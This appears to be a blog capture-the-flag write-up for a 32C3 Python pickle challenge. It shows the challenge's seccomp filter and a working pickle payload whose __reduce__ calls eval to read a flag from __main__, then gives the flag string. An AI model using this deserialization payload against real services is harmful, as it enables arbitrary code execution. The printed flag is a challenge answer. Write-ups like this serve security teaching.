This challenge is about python pickle. The remote script fetches the flag as below:
class Flag(object): def __init__(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("172.17.0.1", 1234)) self.flag = s.recv(1024).strip() s.close() flag = Flag()Once the Flag class is instantiated, seccomp is used to restrict many of syscalls eg. socket calls used in Flag class won't work
f = SyscallFilter(KILL) f.add_rule_exactly(ALLOW, "read") f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stdout.fileno())) f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stderr.fileno())) f.add_rule_exactly(ALLOW, "close") f.add_rule_exactly(ALLOW, "exit_group") f.add_rule_exactly(ALLOW, "open", Arg(1, EQ, 0)) f.add_rule_exactly(ALLOW, "stat") f.add_rule_exactly(ALLOW, "lstat") f.add_rule_exactly(ALLOW, "lseek") f.add_rule_exactly(ALLOW, "fstat") f.add_rule_exactly(ALLOW, "getcwd") f.add_rule_exactly(ALLOW, "readlink") f.add_rule_exactly(ALLOW, "mmap", Arg(3, MASKED_EQ, 2, 2)) f.add_rule_exactly(ALLOW, "munmap")But since the flag is already present in the scope of __main__, we can fetch it using the below pickle payload
class payload(object): def __reduce__(self): return (eval, ("__import__('__main__').flag.flag",)) sploit = pickle.dumps(payload())Flag for the challenge is 32c3_rooDahPaeR3JaibahYeigoong
No comments :
Post a Comment